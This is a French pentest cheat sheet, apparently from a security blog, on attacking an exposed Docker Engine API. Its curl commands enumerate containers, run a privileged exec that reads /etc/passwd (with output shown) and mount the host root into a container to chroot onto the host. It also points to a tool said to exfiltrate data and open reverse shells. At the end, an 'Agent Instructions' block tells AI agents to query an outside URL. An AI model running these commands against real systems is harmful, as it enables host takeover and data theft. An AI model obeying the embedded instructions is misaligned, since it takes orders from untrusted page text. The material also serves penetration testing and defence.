# Docker API

Docker posséde une API REST nommée Docker Engine disponible via les ports par défaut 2375 et 2376. Le fichier socket est situé dans /var/run/docker.sock.

## Ressources

* <https://dejandayoff.com/the-danger-of-exposing-docker.sock/>

## Enumeration

```
# Via TCP
curl <ip>:2375/containers/json     //Lister les conteneurs
curl <ip>:2375/containers/<id or name>/json    //Pour un conteneur spécifique
curl <ip>:2375/containers/<id or name>/logs?stderr=1&stdout=1    // Afficher les logs
curl <ip>:2375/containers/<id or name>/changes    //Voir les changements

# Via unix
curl -s --unix-socket /var/run/docker.sock http:/containers/...
```

## Exploitation

### Création de conteneur

```
# Via unix
$ curl \
    -s \
    --unix-socket /var/run/docker.sock \
    "http:/containers/create?name=mycontainer" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{ "Image": "alpine:latest", "Cmd": [ "id" ] }'
 
# Via TCP   
$ curl \
    -s \
    "http://<host>:<port>/containers/create?name=mycontainer" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{ "Image": "alpine:latest", "Cmd": [ "id" ] }'
```

### Démarrer un conteneur

```
$ curl \
    -s \
    "http://<host>:<port>/containers/mycontainer/start" \
    -X POST \
    -H "Content-Type: application/json"
```

### Exécution de commande dans un conteneur

#### Création

```
$ curl \
    -s \
    "http://<host>:<port>/containers/<container_id>/exec" \
    -X POST \
    -H "Content-Type: application/json" \
    -d '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}'

HTTP/1.1 201 Created
...

{"Id":"913c5ce2f3bc..."}
```

#### Exécution

```
$ curl \
    -s \
    "http://<host>:<port>/exec/913c5ce2f3bc.../start"
    -X POST \
    -H "Content-Type: application/json" \
    -d '{"Detach": false,"Tty": false}' \

HTTP/1.1 200 OK
...

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```

### Exécution de commande sur l'hôte

#### Créer une image

```
$ curl \
    -s \
    "http://<host>:<port>/images/create?fromImage=ubuntu&tag=latest" \
    -X POST \
    -H 'Content-Type: application/json'
```

#### Créer un conteneur

```
$ curl \
    -s \
    "http://<host>:<port>/containers/create"
    -X POST \
    -H "Content-Type: application/json" \
    -d '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "ubuntu","Volumes": {"/hostfs/": {}},"HostConfig": {"Binds": ["/:/hostfs"]}}'
```

#### Lancer le conteneur

#### Changer le repertoire racine

`$ chroot /hostfs`

## Outils

### Docker Knocker

Docker Knocker est un outil d'exploitation d'API docker exposée sans authentification. Il permet notamment l'exfiltration de données vers un serveur distant et l'exécution de reverse shell.

Ressource: <https://github.com/n00py/DockerKnocker/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.s1rn3tz.ovh/pentest-conteneurs/docker/docker-api.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.